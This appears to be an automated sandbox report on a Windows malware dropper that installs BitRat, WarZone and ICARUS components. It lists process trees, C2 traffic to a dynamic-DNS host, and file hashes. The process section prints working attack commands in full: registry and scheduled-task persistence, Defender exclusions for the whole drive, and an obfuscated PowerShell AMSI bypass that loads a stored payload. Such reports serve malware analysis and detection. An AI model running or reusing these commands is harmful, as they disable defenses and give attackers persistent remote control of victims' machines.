| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe
"C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR' -Value '"C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AaQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZwBuACMAPgA="
C:\Users\Admin\AppData\Local\Temp\$77Install.exe
"C:\Users\Admin\AppData\Local\Temp\$77Install.exe"
C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe"
C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
"C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:WOtmSWFShvRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pfjvFlSDBXsxDi,[Parameter(Position=1)][Type]$CjhdyUjELm)$udbfxqizmVH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+'l'+'e'+'ct'+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'gat'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+'M'+'o'+''+'d'+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+''+[Char](84)+'yp'+[Char](101)+'','C'+'l'+''+'a'+''+'s'+''+[Char](115)+','+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+'e'+[Char](97)+'l'+[Char](101)+''+'d'+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+',A'+[Char](117)+''+'t'+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$udbfxqizmVH.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+'ci'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+'d'+'e'+'By'+[Char](83)+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$pfjvFlSDBXsxDi).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+','+'M'+'a'+'n'+''+[Char](97)+'ged');$udbfxqizmVH.DefineMethod(''+'I'+'n'+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'Hi'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+'al',$CjhdyUjELm,$pfjvFlSDBXsxDi).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+'M'+'a'+''+[Char](110)+'a'+[Char](103)+'ed');Write-Output $udbfxqizmVH.CreateType();}$OoNMDpxBWibyq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+'af'+'e'+''+'O'+''+'o'+''+[Char](78)+''+'M'+''+[Char](68)+''+'p'+''+'x'+''+'B'+'W'+[Char](105)+''+[Char](98)+''+[Char](121)+''+[Char](113)+'');$pSxMtMXrgQCnhN=$OoNMDpxBWibyq.GetMethod('p'+[Char](83)+''+[Char](120)+''+'M'+''+[Char](116)+''+'M'+''+[Char](88)+''+'r'+'g'+'Q'+''+[Char](67)+''+[Char](110)+''+'h'+''+'N'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hwiWSEMWABBejCSBBAf=WOtmSWFShvRL @([String])([IntPtr]);$tebFqUkDLOwRrMToAKFvzU=WOtmSWFShvRL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JlaihCxEFiI=$OoNMDpxBWibyq.GetMethod(''+[Char](71)+'e'+'t'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$HkssHkJtViOVNJ=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$JlaihCxEFiI,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+'A')));$yEmWqtIjIKAKqAVit=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$JlaihCxEFiI,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$raNrStu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HkssHkJtViOVNJ,$hwiWSEMWABBejCSBBAf).Invoke(''+'a'+''+'m'+'s'+[Char](105)+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$kijCdUeoZuAnJNFXn=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$raNrStu,[Object](''+[Char](65)+'m'+'s'+'i'+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$bLvdKwpgzr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yEmWqtIjIKAKqAVit,$tebFqUkDLOwRrMToAKFvzU).Invoke($kijCdUeoZuAnJNFXn,[uint32]8,4,[ref]$bLvdKwpgzr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$kijCdUeoZuAnJNFXn,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yEmWqtIjIKAKqAVit,$tebFqUkDLOwRrMToAKFvzU).Invoke($kijCdUeoZuAnJNFXn,[uint32]8,0x20,[ref]$bLvdKwpgzr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
"C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AyQtOnZxLTaz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LCnzyOUSddtaFk,[Parameter(Position=1)][Type]$UakHJczsjl)$qfggMrAoIXv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+'e'+'m'+''+[Char](111)+'ry'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'ic'+[Char](44)+'Se'+[Char](97)+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$qfggMrAoIXv.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+'e'+','+[Char](72)+'ide'+[Char](66)+''+[Char](121)+'Sig'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$LCnzyOUSddtaFk).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$qfggMrAoIXv.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'ide'+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+'N'+'ewSl'+'o'+''+'t'+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+'ua'+[Char](108)+'',$UakHJczsjl,$LCnzyOUSddtaFk).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+'a'+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $qfggMrAoIXv.CreateType();}$rYVFnUAlTrsWl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+'e'+'m'+''+[Char](46)+'d'+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+'Wi'+'n'+''+[Char](51)+''+[Char](50)+'.'+'U'+''+'n'+'s'+[Char](97)+''+[Char](102)+'e'+[Char](114)+''+[Char](89)+'V'+[Char](70)+''+'n'+''+'U'+''+[Char](65)+''+'l'+''+[Char](84)+''+[Char](114)+''+'s'+'Wl');$uBiOvSuBbnJfpW=$rYVFnUAlTrsWl.GetMethod(''+'u'+''+[Char](66)+''+[Char](105)+''+'O'+''+[Char](118)+''+'S'+'u'+[Char](66)+''+'b'+''+[Char](110)+''+[Char](74)+''+'f'+'p'+[Char](87)+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+',S'+[Char](116)+'a'+[Char](116)+''+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BbpOVFUxnorBTkxGvjC=AyQtOnZxLTaz @([String])([IntPtr]);$oZxccsDUJBpjlLKxNJSXyh=AyQtOnZxLTaz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ITjqlmzkwBc=$rYVFnUAlTrsWl.GetMethod('G'+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$wVpgrxmdXxYtdd=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ITjqlmzkwBc,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$AtYTgCLZlVLfKbWiR=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ITjqlmzkwBc,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+'o'+''+'t'+'e'+'c'+''+'t'+'')));$ntoRZJq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wVpgrxmdXxYtdd,$BbpOVFUxnorBTkxGvjC).Invoke(''+'a'+'m'+[Char](115)+''+'i'+'.'+[Char](100)+'l'+[Char](108)+'');$hvRSorvhVPjOjqRcZ=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ntoRZJq,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$HePbTHHcGC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AtYTgCLZlVLfKbWiR,$oZxccsDUJBpjlLKxNJSXyh).Invoke($hvRSorvhVPjOjqRcZ,[uint32]8,4,[ref]$HePbTHHcGC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hvRSorvhVPjOjqRcZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AtYTgCLZlVLfKbWiR,$oZxccsDUJBpjlLKxNJSXyh).Invoke($hvRSorvhVPjOjqRcZ,[uint32]8,0x20,[ref]$HePbTHHcGC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.cmdline"
C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
"C:\Users\Admin\AppData\Local\Temp\$77icaro.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESECD6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7FCCC60AE1614FD7B713EA441ED24B43.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath C:\
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"
C:\ProgramData\$77images.exe
"C:\ProgramData\$77images.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath C:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f6ecc4b9-3dd8-44cd-92c1-e74b525bf90c}
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 52.182.141.63:443 | N/A | tcp |
| N/A | 2.18.109.224:443 | N/A | tcp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 93.184.221.240:80 | N/A | tcp |
| N/A | 93.184.221.240:80 | N/A | tcp |
| N/A | 93.184.221.240:80 | N/A | tcp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 93.184.221.240:80 | N/A | tcp |
Files
memory/5036-132-0x00000000001B0000-0x0000000000A8C000-memory.dmp
memory/5036-133-0x00000000057F0000-0x0000000005D94000-memory.dmp
memory/808-135-0x0000000000000000-mapping.dmp
memory/4924-137-0x00000000051E0000-0x0000000005216000-memory.dmp
memory/3536-136-0x0000000000000000-mapping.dmp
memory/4924-134-0x0000000000000000-mapping.dmp
memory/4924-138-0x0000000005930000-0x0000000005F58000-memory.dmp
memory/4924-139-0x0000000005850000-0x0000000005872000-memory.dmp
memory/4924-140-0x00000000060D0000-0x0000000006136000-memory.dmp
memory/4924-141-0x00000000061B0000-0x0000000006216000-memory.dmp
memory/2416-142-0x0000000000000000-mapping.dmp
memory/2416-143-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/2416-145-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/4924-146-0x00000000066A0000-0x00000000066BE000-memory.dmp
memory/3860-147-0x0000000000000000-mapping.dmp
memory/3748-148-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77Install.exe
| MD5 | 2656bb680bc4b4a95ce5cb1443b2850d |
| SHA1 | 3033d5adc32e3df44205408dd3689670756e55a4 |
| SHA256 | 68755b0a7b376687d2202dc117b78a5142ca2ec14d14f3c20890b93bf8ed221c |
| SHA512 | 59e4706033b565754f67620a5cb7057c79507ce681852a26e7de5bec7c6d58b87b5c6766db588dbbf6d7581ba6efb85019298308cadc9e2f85471e722dd0ed76 |
memory/2908-150-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
| MD5 | f8169767c726f1be7a7e14839cc44d36 |
| SHA1 | 571bcdb58a2017d77593ea1325bac737160b81f4 |
| SHA256 | 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377 |
| SHA512 | c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05 |
memory/212-153-0x0000000000000000-mapping.dmp
memory/3772-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
| MD5 | ca607a7fb0fa99f0ef20300deea83d55 |
| SHA1 | f6348167625781bb441dfcbb49f8e65c62144adf |
| SHA256 | 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36 |
| SHA512 | ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6 |
memory/4432-160-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
